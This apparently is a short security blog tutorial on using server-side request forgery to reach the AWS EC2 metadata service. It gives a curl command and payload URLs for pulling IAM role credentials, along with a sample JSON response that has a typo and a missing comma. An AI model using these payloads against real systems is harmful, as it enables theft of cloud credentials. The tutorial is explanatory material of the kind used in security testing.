CALL US

+91 9116117170

Abusing the AWS Metadata services using SSRF | Cyberops

Abusing the AWS Metadata services using SSRF

By Devashish Soni 0 Comment March 5, 2020

What is AWS

AWS stands for amazon web services. It is a platform that offers reliable, flexible, easy-to-use, cost-effective and scalable cloud computing solutions.

What is SSRF

SSRF stands for Server-Side Request Forgery. It is a vulnerability that let’s an attacker send crafted requests from the back-end server of a vulnerable web application. Attackers usually use SSRF attacks to target the internal systems of a network that are behind some kind of firewalls and are not accessible from the external network itself. An attacker who knows this vulnerability may also use SSRF to access services that are available through the loopback interface like ‘127.0.0.1’. And this is what an attacker can use to get your AWS secret key.

How this vulnerability work

AWS EC2 (Elastic Compute Cloud) has a service that’s called instance metadata service. This service enables any EC2 instance to access the REST API running on 169.254.169.254. Which returns the data about the instance.

You can use this command on an AWS instance to retrieve IAM (identity and access management) role named s3access

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access

and here is an example output from the instance

 {   “Code” : “Success”, “LastUpdated” : “2020-01-01T01:01:01Z”, “Type” : “AWS-HMAC”,   “AccessKeyId” : “Your-AWS-Access-Key-Id”, “SecretAccessKey” : “Your-AWS-Secret-Key”   “Token” : “token”,   “Expiration” : “2020-01-01T02:002:02Z” }

How Do we Use It?

Well next time, if you found an SSRF vulnerability in a web application which is using AWS try hitting these examples

http://169.254.169.254/latest/meta-data/iam/security-credentials

http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access

error: Content is protected by Cyberops !!